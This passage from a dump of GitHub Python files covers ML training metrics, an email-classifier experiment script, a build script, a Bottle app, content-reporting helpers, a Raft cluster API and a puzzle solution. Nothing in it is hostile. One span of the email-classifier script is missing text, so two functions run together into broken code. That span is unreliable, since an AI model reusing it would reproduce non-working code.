args.append(train_dice)\n\n dict_variables = dict(zip(self.keys, args))\n for k, v in dict_variables.items():\n self.measures[k].update(v)\n\n def log(self, epoch, step):\n # self.logger.info('epoch : %d, step : %d, train_loss: %.4f, train_dice: %.4f' % (\n # epoch, step, self.measures['loss_all'].avg, self.measures['train_dice'].avg))\n\n log_string, params = 'Epoch : {}', []\n for k in self.keys:\n log_string += ', ' + k + ': {:.4f}'\n params.append(self.measures[k].val)\n self.logger.info(log_string.format(epoch, *params))\n\n for k, measure in self.measures.items():\n k = 'pretrain/' + k\n self.writer.add_scalar(k, measure.avg, step)\n self.writer.flush()\n\n\nclass STMeasures(Measures):\n def __init__(self, writer, logger):\n keys = ['train_loss', 'sup_all_loss', 'sup_ce_loss', 'sup_rad_loss', 'sup_con_loss', 'sup_dice_loss',\n 'certain_all_loss', 'certain_ce_loss', 'certain_rad_loss', 'certain_con_loss', 'uncertain_loss',\n 'train_dice', 'unlab_dice', 'unlab_rad_dice', 'unlab_con_dice', 'lab_con_dice', 'lab_rad_dice']\n super(STMeasures, self).__init__(keys, writer, logger)\n\n @torch.no_grad()\n def update(self, out1, out2, lab1, lab2, *args):\n mask1 = get_mask(out1[0])\n mask2 = get_mask(out2[0])\n dices = [statistic.dice_ratio(mask1, lab1), statistic.dice_ratio(mask2, lab2), statistic.dice_ratio(get_mask(out1[2]), lab1),\n statistic.dice_ratio(get_mask(out2[2]), lab2), statistic.dice_ratio(get_mask(out1[1]), lab1),\n statistic.dice_ratio(get_mask(out2[1]), lab2)]\n args = list(args)\n args.extend(dices)\n dict_variables = dict(zip(self.keys, args))\n\n for k, v in dict_variables.items():\n self.measures[k].update(v)\n\n def log(self, epoch):\n log_keys = ['train_loss', 'sup_all_loss', 'certain_all_loss', 'uncertain_loss',\n 'train_dice', 'unlab_dice', 'lab_rad_dice', 'lab_con_dice', 'unlab_rad_dice', 'unlab_con_dice']\n log_string = 'Epoch : {}'\n params = []\n for k in log_keys:\n log_string += ', ' + k + ': {:.4f}'\n params.append(self.measures[k].val)\n self.logger.info(log_string.format(epoch, *params))\n\n def write_tensorboard(self, epoch):\n for k, measure in self.measures.items():\n if 'sup' in k or 'train_loss' in k:\n k = 'supervised_loss/' + k\n elif 'certain' in k:\n k = 'upsupervised_loss/' + k\n else:\n k = 'dice/' + k\n self.writer.add_scalar(k, measure.avg, epoch)\n self.writer.flush()\n","repo_name":"koncle/CoraNet","sub_path":"utils1/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"53"} +{"seq_id":"5515364769","text":"from kerasClassify import *\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.feature_selection import SelectKBest, chi2\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.neighbors import KNeighborsClassifier\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\n# Dataset tsv file path. Each line is an email\ncsvEmailsFilePath = \"./data/enron_6_email_folders_KAMINSKI.tsv\";\n\n\n\ndef select_best_features(dataset, train_labels, num_best, verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n if verbose:\n print('\\nSelecting %d best features\\n'%num_best)\n selector = SelectKBest(chi2, k=num_best)\n X_train = selector.fit_transform(X_train,train_labels)\n X_test = selector.transform(X_test)\n return ((X_train, Y_train), (X_test, Y_test)),selector.scores_\n\ndef plot_feature_scores(feature_names,scores,limit_to=None,save_to=None,best=True):\n plt.figure()\n if best:\n plt.title(\"Best features\")\n else:\n plt.title(\"Worst features\")\n if limit_to is None:\n limit_to = len(features_names)\n #for some reason index 0 always wrong\n scores = np.nan_to_num(scores)\n if best:\n indices = np.argsort(scores)[-limit_to:][::-1]\n else:\n indices = np.argsort(scores)[:limit_to]\n #indices = np.argpartition(scores,-limit_to)[-limit_to:]\n plt.bar(range(limit_to), scores[indices],color=\"r\", align=\"center\")\n plt.xticks(range(limit_to),np.array(feature_names)[indices],rotation='vertical')\n plt.xlim([-1, limit_to])\n plt.ylabel('Score')\n plt.xlabel('Word')\n plt.show(block=False)\n if save_to is not None:\n plt.savefig(save_to,bbox_inches='tight')\n\ndef plot_confusion_matrix(cm, label_names, title='Confusion matrix', cmap=plt.cm.Blues, save_to = None):\n plt.figure()\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n tick_marks = np.arange(len(label_names))\n plt.xticks(tick_marks, label_names, rotation='vertical')\n plt.yticks(tick_marks, label_names)\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n if save_to is not None:\n plt.savefig(save_to,bbox_inches='tight')\n\ndef make_plot(x,y,title=None,x_name=None,y_name=None,save_to=None,color='b',new_fig=True):\n if new_fig:\n plt.figure()\n plot = plt.plot(x,y,color)\n if title is not None:\n plt.title(title)\n if x_name is not None:\n plt.xlabel(x_name)\n if y_name is not None:\n plt.ylabel(y_name)\n if save_to is not None:\n plt.savefig(save_to,bbox_inches='tight')\n return plot\n\ndef make_plots(xs,ys,labels,title=None,x_name=None,y_name=None,y_bounds=None,save_to=None):\n colors = ('b', 'g', 'r', 'c', 'm', 'y', 'k')\n handles = []\n plt.figure()\n plt.hold(True)\n for i in range(len(labels)):\n plot, = make_plot(xs[i],ys[i],color=colors[i%len(colors)],new_fig=False)\n handles.append(plot)\n plt.legend(handles,labels)\n if title is not None:\n plt.title(title)\n if x_name is not None:\n plt.xlabel(x_name)\n if y_name is not None:\n plt.ylabel(y_name)\n if y_bounds is not None:\n plt.ylim(y_bounds)\n if save_to is not None:\n plt.savefig(save_to,bbox_inches='tight')\n plt.hold(False)\n\ndef get_baseline_dummy(dataset,train_label_list,test_label_list,verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n dummy = DummyClassifier()\n dummy.fit(X_train,train_label_list)\n predictions = dummy.predict(X_test)\n accuracy = accuracy_score(test_label_list,predictions)\n \n if verbose:\n print('Got baseline of %f with dummy classifier'%accuracy)\n\n return accuracy\n\ndef get_baseline_svm(dataset,train_label_list,test_label_list,verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n linear = LinearSVC(penalty='l1',dual=False)\n grid_linear = GridSearchCV(linear, {'C':[0.1, 0.5, 1, 5, 10]}, cv=5)\n grid_linear.fit(X_train,train_label_list)\n accuracy = grid_linear.score(X_test, test_label_list)\n \n if verbose:\n print('Got baseline of %f with svm classifier'%accuracy)\n\n return accuracy\n\ndef get_baseline_knn(dataset,train_label_list,test_label_list,verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n knn = KNeighborsClassifier(n_neighbors=100,n_jobs=-1)\n knn.fit(X_train,train_label_list)\n predictions = np.round(knn.predict(X_test))\n accuracy = accuracy_score(test_label_list,predictions)\n\n if verbose:\n print('Got baseline of %f with linear regression '%accuracy)\n\n return accuracy\n\ndef get_baseline_pa(dataset,train_label_list,test_label_list,verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n classifier = PassiveAggressiveClassifier(n_jobs=-1,fit_intercept=True)\n classifier.fit(X_train,train_label_list)\n accuracy = classifier.score(X_test,test_label_list)\n \n if verbose:\n print('Got baseline of %f with Passive Aggressive classifier'%accuracy)\n\n return accuracy\n\ndef run_once(verbose=True,test_split=0.1,ftype='binary',num_words=10000,select_best=4000,num_hidden=512,dropout=0.5, plot=True,plot_prefix='',graph_to=None,extra_layers=0): \n features,labels,feature_names,label_names = get_ngram_data(emailsFilePath=csvEmailsFilePath, num_words=num_words,matrix_type=ftype,verbose=verbose)\n num_labels = len(label_names)\n dataset,train_label_list,test_label_list = make_dataset(features,labels,num_labels,test_split=test_split)\n if select_best and select_bestmaxacc:\n maxacc = acc\n maxtype = ftype\n accs.append(acc)\n all_baselines.append(baselines)\n all_times.append(times)\n all_accs.append(accs)\n print('\\nWord count accuracies:%s\\n'%str(accs))\n make_plots(all_counts,all_accs,types,title='Test accuracy vs max words',y_name='Test accuracy',x_name='Max most frequent words',save_to='word_accs.png',y_bounds=(0,1))\n make_plots(all_counts,all_accs,types,title='Test accuracy vs max words',y_name='Test accuracy',x_name='Max most frequent words',save_to='word_accs_zoomed.png',y_bounds=(0.6,0.95))\n make_plots(all_counts,all_baselines,types,title='Baseline accuracy vs max words',y_name='Baseline accuracy',x_name='Max most frequent words',save_to='word_baseline_accs.png',y_bounds=(0,1))\n make_plots(all_counts,all_times,types,title='Time vs max words',y_name='Parse+test+train time (seconds)',x_name='Max most frequent words',save_to='word_times.png')\n print('\\nBest word accuracy %f with features %s\\n'%(maxacc,maxtype))\n\ndef test_hidden_dropout():\n #get emails once to pickle\n emails = get_emails(csvEmailsFilePath,verbose=False)\n\n dropouts = [0.25,0.5,0.75]\n all_accs = []\n all_counts = []\n all_times = []\n maxacc = 0\n maxh = 0\n for d in dropouts:\n hidden = [32,64,128,256,512,1024,2048]\n all_counts.append(hidden)\n accs=[]\n times=[]\n print('\\nTesting learning for dropout %f with hidden counts %s\\n'%(d,str(hidden)))\n for h in hidden:\n start = time.time()\n acc = sum([run_once(dropout=d,num_words=2500,num_hidden=h,plot=False,verbose=False,select_best=None)[3] for i in range(5)])/5.0\n end = time.time()\n elapsed = (end-start)/5.0\n times.append(elapsed)\n print('\\nGot acc %f for hidden count %d in %d seconds'%(acc,h,elapsed))\n if acc>maxacc:\n maxacc = acc\n maxh = h\n accs.append(acc)\n all_times.append(times)\n all_accs.append(accs)\n print('\\nWord count accuracies:%s\\n'%str(accs))\n make_plots(all_counts,all_accs,['Droupout=%f'%d for d in dropouts],title='Test accuracy vs num hidden',y_name='Test accuracy',x_name='Number of hidden units',save_to='hidden_accs.png',y_bounds=(0,1))\n make_plots(all_counts,all_accs,['Droupout=%f'%d for d in dropouts],title='Test accuracy vs num hidden',y_name='Test accuracy',x_name='Number of hidden units',save_to='hidden_accs_zoomed.png',y_bounds=(0.8,1))\n make_plots(all_counts,all_times,['Droupout=%f'%d for d in dropouts],title='Time vs max words',y_name='Parse+test+train time (seconds)',x_name='Number of hidden units',save_to='hidden_times.png')\n print('\\nBest word accuracy %f with hidden %d\\n'%(maxacc,maxh))\n\ndef test_select_words(num_hidden=512):\n #get emails once to pickle\n emails = get_emails(csvEmailsFilePath,verbose=False)\n\n word_counts = [2500,3500,4500,5500]\n all_accs = []\n all_counts = []\n all_times = []\n maxacc = 0\n maxs = None\n for word_count in word_counts:\n select = [0.5,0.6,0.7,0.8,0.9]\n all_counts.append(select)\n accs=[]\n times=[]\n print('\\nTesting learning for word count %d with selects %s\\n'%(word_count,str(select)))\n for s in select:\n start = time.time()\n acc = sum([run_once(num_hidden=num_hidden,dropout=0.1,num_words=word_count,plot=False,verbose=False,select_best=int(s*word_count))[3] for i in range(5)])/5.0\n end = time.time()\n elapsed = (end-start)/5.0\n times.append(elapsed)\n print('\\nGot acc %f for select ratio %f in %d seconds'%(acc,s,elapsed))\n if acc>maxacc:\n maxacc = acc\n maxs = s\n accs.append(acc)\n all_times.append(times)\n all_accs.append(accs)\n print('\\nWord count accuracies:%s\\n'%str(accs))\n make_plots(all_counts,all_accs,['Words=%d'%w for w in word_counts],title='Test accuracy vs ratio of words kept',y_name='Test accuracy',x_name='Ratio of best words kept',save_to='select_accs_%d.png'%num_hidden,y_bounds=(0,1))\n make_plots(all_counts,all_accs,['Words=%d'%w for w in word_counts],title='Test accuracy vs ratio of words kept',y_name='Test accuracy',x_name='Ratio of best words kept',save_to='select_accs_zoomed_%d.png'%num_hidden,y_bounds=(0.8,1))\n make_plots(all_counts,all_times,['Words=%d'%w for w in word_counts],title='Time vs ratio of words kept',y_name='Parse+test+train time (seconds)',x_name='Ratio of best words kept',save_to='select_times_%d.png'%num_hidden,y_bounds=(0,65))\n print('\\nBest word accuracy %f with select %f\\n'%(maxacc,maxs))\n\n\n# ------- Experiments -----------------------------\n# True to run feature extraction, selection + svm baseline (~ 0.78)\n \nrun_baseline = False\n#test_features_words()\n#test_hidden_dropout()\n#test_select_words(128)\n#test_select_words(32)\n#test_select_words(16)\n\n# TODO: try ftype = 'tfidf'\nrun_once(num_words=10000,dropout=0.5,num_hidden=512, extra_layers=0,plot=True,verbose=True,select_best=4000)\n\nif (run_baseline):\n features,labels,feature_names,label_names = get_ngram_data(emailsFilePath=csvEmailsFilePath,num_words=5000,matrix_type='tfidf',verbose=True,max_n=1)\n #features,labels,label_names = get_sequence_data()\n num_labels = len(label_names)\n dataset,train_label_list,test_label_list = make_dataset(features,labels,num_labels,test_split=0.1)\n \n # Feature selection (best 4000 features)\n dataset,scores = select_best_features(dataset,train_label_list,4000,verbose=True)\n \n # Unrem for baseline svm \n baseline = get_baseline_svm(dataset,train_label_list,test_label_list,verbose=True) \n \n # Unrem for convnet (not very good at intial tests)\n # predictions,acc = evaluate_conv_model(dataset,num_labels,num_hidden=512,verbose=True,with_lstm=True)\n","repo_name":"andreykurenkov/emailinsight","sub_path":"pyScripts/kerasExperiments.py","file_name":"kerasExperiments.py","file_ext":"py","file_size_in_byte":14040,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"27507997811","text":"# Build script\n\n# COMMAND FORMAT:\n# py build.py --server/client/both --debug/release --build/run/clean --doc/nodoc\n# ALL OPTIONS ARE REQUIRED BECAUSE I'M LAZY\n\nimport sys, os\n\nfile_list = \"\"\nexe_name = \"\"\ncompileServer = False\ncompileClient = False\ndebug = False\n\ndef main():\n global compileServer\n global compileClient\n global debug\n \n if sys.argv[1] == \"--server\":\n compileServer = True\n elif sys.argv[1] == \"--client\":\n compileClient = True\n elif sys.argv[1] == \"--both\":\n compileServer = True\n compileClient = True\n else:\n print(\"Invalid option. \\nUsage:\\n\\t--server - Build the server.\\n\\t--client - Build the client.\\n\\t--both - Build both client and server.\")\n \n if sys.argv[2] == \"--debug\":\n debug = True\n elif sys.argv[2] == \"--release\":\n debug = False\n else:\n print(\"Invalid option. \\nUsage:\\n\\t--debug - Build with debug information and dynamic.\\n\\t--release - Build static without debug information.\")\n \n if sys.argv[3] == \"--build\":\n clean()\n build()\n elif sys.argv[3] == \"--run\":\n clean()\n build()\n run()\n elif sys.argv[3] == \"--clean\":\n clean()\n else:\n print(\"Invalid option. \\nUsage:\\n\\tbuild - Build the code.\\n\\trun - Build and run the code.\\n\\tclean - Delete the bin folder and all files within.\")\n \n if sys.argv[4] == \"--doc\":\n gen_doc()\n elif sys.argv[4] == \"--nodoc\":\n print(\"Warning: Documentation not generated, may be out of date!\")\n else:\n print(\"Invalid option. \\nUsage:\\n\\t--doc - Build documentation.\\n\\t--nodoc - Do not build documentation.\")\n return\n\ndef build():\n global exe_name\n global file_list\n if compileClient:\n file_list = \"\"\n exe_name = \"client.exe\"\n os.chdir(\".\\\\client\")\n os.mkdir(\".\\\\bin\")\n compile(\"client_socket\", True)\n compile(\"main\", True)\n compile(\"\", False)\n os.chdir(\"..\\\\\")\n if compileServer:\n file_list = \"\"\n exe_name = \"server.exe\"\n os.chdir(\".\\\\server\")\n os.mkdir(\".\\\\bin\")\n compile(\"server_socket\", True)\n compile(\"main\", True)\n compile(\"\", False)\n os.chdir(\"..\\\\\")\n\ndef compile(cpp_file, component):\n global file_list\n global exe_name\n\n if component:\n os.system(\"echo Compiling \" + cpp_file)\n os.system(\"g++ -std=c++11 -c -g \" + cpp_file + \".cpp\" + \" -o \" + \".\\\\bin\\\\\" + cpp_file + \".o\" + \" -D_WIN32_WINNT=0x0A00\")\n file_list += (\".\\\\bin\\\\\" + cpp_file + \".o \")\n else:\n #print(file_list)\n os.system(\"g++ -std=c++11 -g \" + file_list + \"-o \" + \".\\\\bin\\\\\" + exe_name + \" -L .\\\\lib -lsocket_handler\" + \" -lws2_32\" + \" -D_WIN32_WINNT=0x0A00\")\n\ndef gen_doc():\n os.system(\"doxygen .\\\\docs\\\\lovelace.doxygen\")\n os.chdir(\".\\\\client\\\\\")\n os.chdir(\"..\\\\docs\\\\latex\")\n os.system(\".\\\\make\")\n os.chdir(\"..\\\\..\\\\client\\\\\")\n \ndef run():\n if compileServer:\n os.chdir(\".\\\\server\")\n os.system(\".\\\\bin\\\\server.exe\")\n os.chdir(\"..\\\\\")\n if compileClient:\n os.chdir(\".\\\\client\")\n os.system(\".\\\\bin\\\\client.exe\")\n os.chdir(\"..\\\\\")\n\ndef clean():\n if compileServer:\n os.chdir(\".\\\\server\\\\\")\n os.system(\"rmdir /s /q .\\\\bin\\\\\")\n os.chdir(\"..\\\\\")\n if compileClient:\n os.chdir(\".\\\\client\")\n os.system(\"rmdir /s /q .\\\\bin\\\\\")\n os.chdir(\"..\\\\\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"regerj/lovelace","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40105001503","text":"#-*- coding:utf-8 -*-\n\nimport os\nimport sys\n\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\nLIBS_ROOT = os.path.join(APP_ROOT, 'libs')\nTEMPLATES_ROOT = os.path.join(APP_ROOT, 'templates')\nSTATIC_ROOT = os.path.join(APP_ROOT, 'static')\nsys.path.insert(0, LIBS_ROOT)\n\nimport bottle\nfrom bottle import Bottle, static_file, request\nfrom bottle import mako_template as template\nfrom beaker.middleware import SessionMiddleware\n\nbottle.TEMPLATE_PATH.insert(0, TEMPLATES_ROOT)\nsession_options = {\n 'session.type': 'cookie',\n 'session.validate_key': True,\n}\n\napp = Bottle()\n\n\n@app.route('/')\n@app.route('/user/')\ndef hello(name=\"vvonder\"):\n return template('index', **locals())\n\n\n@app.route('/test')\ndef test():\n s = request.environ.get('beaker.session')\n s['test'] = s.get('test', 0) + 1\n s.save()\n return 'Test conter: %d' % s['test']\n\n\n@app.route('/static/')\ndef send_static(filename):\n return static_file(filename, root=STATIC_ROOT)\n\n\napp = SessionMiddleware(app, session_options)\n\nif 'SERVER_SOFTWARE' in os.environ:\n from bae.core.wsgi import WSGIApplication\n application = WSGIApplication(app)\nelse:\n from bottle import run\n run(app, host='0.0.0.0', reloader=True, debug=True)\n","repo_name":"vvonder/lab","sub_path":"bae/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27308472443","text":"\"\"\"User content reporting.\"\"\"\n\nfrom typing import Optional\n\nfrom comcatlib import User\nfrom marketplace import Offer\nfrom tenantcalendar import UserEvent\nfrom tenantforum import Response, Topic\n\nfrom reportlib.orm import OfferReport\nfrom reportlib.orm import TopicReport\nfrom reportlib.orm import ResponseReport\nfrom reportlib.orm import UserEventReport\n\n\n__all__ = [\"report_offer\", \"report_topic\", \"report_response\", \"report_user_event\"]\n\n\ndef report_offer(\n reporter: User,\n offer: Offer,\n *,\n title: Optional[bool] = None,\n text: Optional[bool] = None,\n image: Optional[bool] = None\n) -> OfferReport:\n \"\"\"Report an offer.\"\"\"\n\n try:\n report = OfferReport.get(\n (OfferReport.reporter == reporter) & (OfferReport.offer == offer)\n )\n except OfferReport.DoesNotExist:\n report = OfferReport(reporter=reporter, offer=offer)\n\n return report.update_report(title=title, text=text, image=image)\n\n\ndef report_topic(\n reporter: User,\n topic: Topic,\n *,\n title: Optional[bool] = None,\n text: Optional[bool] = None,\n image: Optional[bool] = None\n) -> TopicReport:\n \"\"\"Report a tenant forum topic.\"\"\"\n\n try:\n report = TopicReport.get(\n (TopicReport.reporter == reporter) & (TopicReport.topic == topic)\n )\n except TopicReport.DoesNotExist:\n report = TopicReport(reporter=reporter, topic=topic)\n\n return report.update_report(title=title, text=text, image=image)\n\n\ndef report_response(\n reporter: User,\n response: Response,\n *,\n title: Optional[bool] = None,\n text: Optional[bool] = None,\n image: Optional[bool] = None\n) -> ResponseReport:\n \"\"\"Report a tenant forum response.\"\"\"\n\n try:\n report = ResponseReport.get(\n (ResponseReport.reporter == reporter)\n & (ResponseReport.response == response)\n )\n except ResponseReport.DoesNotExist:\n report = ResponseReport(reporter=reporter, response=response)\n\n return report.update_report(title=title, text=text, image=image)\n\n\ndef report_user_event(\n reporter: User,\n user_event: UserEvent,\n *,\n title: Optional[bool] = None,\n text: Optional[bool] = None,\n image: Optional[bool] = None\n) -> UserEventReport:\n \"\"\"Report a tenant forum response.\"\"\"\n\n try:\n report = UserEventReport.get(\n (UserEventReport.reporter == reporter)\n & (UserEventReport.user_event == user_event)\n )\n except UserEventReport.DoesNotExist:\n report = UserEventReport(reporter=reporter, user_event=user_event)\n\n return report.update_report(title=title, text=text, image=image)\n","repo_name":"homeinfogmbh/reportlib","sub_path":"reportlib/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34274028447","text":"import json\n\nimport requests\nfrom decouple import config\nfrom flask import jsonify, redirect, request\n\nfrom src.api.helper import serialize\nfrom src.cache.cache import cache\nfrom src.messages.client_message import ClientMessage\n\n\ndef external_routes(api):\n ip = config(\"CONTAINER_IP\")\n port = config(\"CONTAINER_PORT\")\n\n @api.route('/', methods=['GET'])\n def root():\n return redirect('/status', code=302)\n\n @api.route('/status', methods=['GET'])\n def status():\n return jsonify(dict(status='OK', message={\n 'internal_ip': ip,\n 'note': 'This is only an External API to get data from redis database',\n 'port': port,\n 'endpoints': [\n {'method': 'GET', 'locator': '/status', 'description': 'shows the status of the external api'},\n {'method': 'GET', 'locator': '/nodes', 'description': 'shows all nodes and leader node'},\n {'method': 'GET', 'locator': '/nodes?ip=',\n 'description': 'get detail about node using Node\\'s internal IP'},\n {'method': 'GET', 'locator': '/elections', 'description': 'shows all elections for each term'},\n {'method': 'GET', 'locator': '/elections?term=', 'description': 'get election for a term'},\n {'method': 'GET', 'locator': '/leaders', 'description': 'shows all leaders for each term'},\n {'method': 'GET', 'locator': '/leaders?term=', 'description': 'get leader for a term'},\n {'method': 'GET', 'locator': '/logs', 'description': 'get logs for all nodes'},\n {'method': 'GET', 'locator': '/logs?ip=', 'description': 'get logs for node with IP'},\n {'method': 'GET', 'locator': '/nodes/move?x=&y=',\n 'description': 'move leader node and other nodes units. can be +ve or -ve'},\n {'method': 'GET', 'locator': '/nodes/position',\n 'description': 'get current positions of all nodes in raft'},\n {'method': 'GET', 'locator': '/nodes/full', 'description': 'get full details of all nodes in raft'},\n ],\n })), 200\n\n @api.route('/nodes', methods=['GET'])\n def nodes():\n node_ip = request.args.get('ip', None)\n all_nodes = cache.get('nodes')\n all_nodes = json.loads(all_nodes) if all_nodes else None\n\n if all_nodes:\n if node_ip:\n filtered = list(filter(lambda node: node['_name'] == f'{node_ip.strip()}:{port}', all_nodes))\n if len(filtered) > 0:\n resp = requests.get(f'http://{node_ip}:{port}', timeout=10)\n data = resp.json()\n return jsonify(dict(status='OK', data=data['message'],\n message=f\"Successfully fetched node with IP {node_ip}\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=f\"No node with IP {node_ip} in raft\")), 404\n else:\n return jsonify(dict(status='OK', data=all_nodes, message=\"Successfully fetched nodes\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No node in raft so far\")), 404\n\n @api.route('/elections', methods=['GET'])\n def elections():\n term = request.args.get('term', None)\n election = cache.get('election')\n election = json.loads(election) if election else None\n\n if election:\n if term:\n term_election = election.get(term, None)\n if term_election:\n return jsonify(dict(status='OK', data=term_election,\n message=f\"Successfully fetched election for term (Term {term})\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=f\"No election for term (Term {term})\")), 404\n else:\n return jsonify(dict(status='OK', data=election, message=\"Successfully fetched elections\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No election so far\")), 200\n\n @api.route('/leaders', methods=['GET'])\n def leaders():\n term = request.args.get('term', None)\n leader = cache.get('leader')\n leader = json.loads(leader) if leader else None\n\n if leader:\n if term:\n term_leader = leader.get(term, None)\n if term_leader:\n return jsonify(dict(status='OK', data=term_leader,\n message=f\"Successfully fetched leader for term (Term {term})\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=f\"No leader for term (Term {term})\")), 404\n else:\n return jsonify(dict(status='OK', data=leader, message=\"Successfully fetched leaders\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No leader so far\")), 200\n\n @api.route('/logs', methods=['GET'])\n def logs():\n node_ip = request.args.get('ip', None)\n all_nodes = cache.get('nodes')\n all_nodes = json.loads(all_nodes) if all_nodes else None\n\n if all_nodes:\n if node_ip:\n filtered = list(filter(lambda node: node['_name'] == f'{node_ip.strip()}:{port}', all_nodes))\n if len(filtered) > 0:\n resp = requests.get(f'http://{node_ip}:{port}/logs', timeout=10)\n data = resp.json()\n return jsonify(dict(status='OK', data=data['message'],\n message=f\"Successfully fetched node logs with IP {node_ip}\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=f\"No node with IP {node_ip} in raft\")), 404\n else:\n result = []\n for n in all_nodes:\n resp = requests.get(f\"http://{n['_name']}/logs\")\n data = resp.json()\n result.append(data)\n return jsonify(dict(status='OK', data=result, message=\"Successfully fetched nodes logs\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No node in raft so far\")), 404\n\n @api.route('/nodes/move', methods=['GET'])\n def move_nodes():\n x = int(request.args.get('x', '0'))\n y = int(request.args.get('y', '0'))\n leaders = cache.get('leader')\n leaders = json.loads(leaders) if leaders else None\n\n if leaders:\n term = max(leaders, key=int)\n leader = leaders.get(term)\n node_addr = leader['_name']\n\n message = ClientMessage(\n 'CLIENT_IP',\n node_addr,\n leader['term'],\n {\n \"move\": [x, y],\n }\n )\n\n resp = requests.post(f'http://{node_addr}/message', json=serialize(message), timeout=60)\n data = resp.json()\n\n if data and hasattr(data, '__getitem__'):\n return jsonify(dict(status='OK', data=data,\n message=f\"Nodes moved successfully. Controlled by leader {node_addr}\")), 200\n else:\n return jsonify(dict(status='OK', data=data,\n message=f\"Failed to move leader node: {node_addr}\\nCould \"\n f\"be that the leader is unavailable due to an ongoing election\")), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No leader appointed yet in raft\")), 404\n\n @api.route('/nodes/position', methods=['GET'])\n def nodes_position():\n all_nodes = cache.get('nodes')\n all_nodes = json.loads(all_nodes) if all_nodes else None\n response = []\n\n if all_nodes:\n for node in all_nodes:\n try:\n resp = requests.get(f\"http://{node['_name']}/status\", timeout=60)\n data = resp.json()\n if data:\n message = data.get('message', {}).get('node', {})\n response.append({'node': message.get('_name'), 'position': message.get('_position')})\n except:\n print('Unfortunate')\n return jsonify(dict(status='OK', data=response,\n message='Successfully fetched node positions')), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No node in raft so far\")), 404\n\n @api.route('/nodes/full', methods=['GET'])\n def nodes_full():\n all_nodes = cache.get('nodes')\n all_nodes = json.loads(all_nodes) if all_nodes else None\n response = []\n\n if all_nodes:\n for node in all_nodes:\n try:\n resp = requests.get(f\"http://{node['_name']}/status\", timeout=60)\n data = resp.json()\n if data:\n response.append(data)\n except:\n print('Unfortunate')\n return jsonify(dict(status='OK', data=response,\n message='Successfully fetched node positions')), 200\n else:\n return jsonify(dict(status='404', data=None, message=\"No node in raft so far\")), 404\n\n","repo_name":"mbao01/raft-escort","sub_path":"src/api/api_external.py","file_name":"api_external.py","file_ext":"py","file_size_in_byte":9472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70257759210","text":"# from parse import *\nfrom functools import reduce\nimport util\nimport re\nimport json\nimport os\n\n\ndef switchToTest():\n global filename\n filename = \"..\\\\data\\\\test.txt\"\n\n\ndef part1(lines):\n diff_1 = []\n diff_3 = []\n\n length = len(lines)\n previous = 0\n for index, jolt in enumerate(lines):\n # if index == length - 1:\n # diff_3.append(jolt)\n # break\n if index != 0:\n previous = lines[index - 1]\n if jolt - previous == 1:\n diff_1.append(jolt)\n elif jolt - previous == 3:\n diff_3.append(jolt)\n print(\"\\n\\n\")\n print(len(diff_1))\n print(len(diff_3) + 1)\n\n pass\n\n\ndef aggregateCounter(index, lines, agg, head):\n head = head.copy()\n head.append(lines[index])\n length = len(lines)\n if index == length - 1:\n agg.append(head)\n return\n\n jolt = lines[index]\n for inc in range(1, 4):\n tmp = jolt + inc\n if tmp in lines:\n aggregateCounter(list.index(lines, tmp), lines, agg, head)\n\n\ndef part2_1(lines):\n agg = []\n print(lines)\n aggregateCounter(0, lines, agg, [])\n # print(*agg[:30], sep=\"\\n\")\n print(len(agg))\n return len(agg)\n\n\ndef part2(lines):\n multList = []\n lines.insert(0, 0)\n lines.append(max(lines))\n index = 0\n while index < len(lines):\n i = 0\n tmpList = [lines[index]]\n while True:\n current = lines[index]\n index += 1\n\n if index + 1 >= len(lines):\n break\n\n next = lines[index]\n tmpList.append(next)\n if next - current == 3:\n index = list.index(lines, next)\n break\n\n if len(tmpList) > 2:\n index = list.index(lines, tmpList[-1])\n multList.append(part2_1(tmpList))\n\n print(multList)\n print(reduce(lambda x, y: x * y, multList))\n\n\nfilename = \"..\\\\data\\\\d10_input.txt\"\n# switchToTest()\n\nabs_file_path = os.path.join(os.path.dirname(__file__), filename)\nlines = open(abs_file_path, \"r\").readlines()\nlines = list(map(lambda x: int(x.strip()), lines))\nlines.sort()\n\n# print (*lines, sep= \"\\n\")\n\n# 